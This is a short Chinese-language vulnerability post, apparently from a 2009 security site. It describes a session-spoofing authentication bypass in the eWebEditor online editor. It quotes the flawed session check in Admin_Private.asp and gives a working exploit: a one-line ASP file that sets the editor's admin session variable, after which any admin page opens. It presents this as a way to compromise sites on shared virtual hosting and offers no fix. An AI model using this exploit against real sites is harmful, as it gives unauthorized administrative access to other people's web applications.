ewebeditor漏洞:eWebEditor  session欺骗漏洞来源: 发布时间:星期六, 2009年9月12日 浏览:3次 评论:0
eWebEditor在线编辑器
漏洞文件:Admin_Private.asp 漏洞语句:<% If Session("eWebEditor_User") = "" Then Response.Redirect "admin_login.asp" Response.End End If 只判断了session没有判断cookies和路径验证问题 漏洞利用: 新建个h4x0r.asp内容如下: <%Session("eWebEditor_User") = "11111111"%> 访问h4x0r.asp再访问后台任何文件for example:Admin_Default.asp 漏洞影响:虚拟主机克星. 0
相关文章读者评论发表评论 |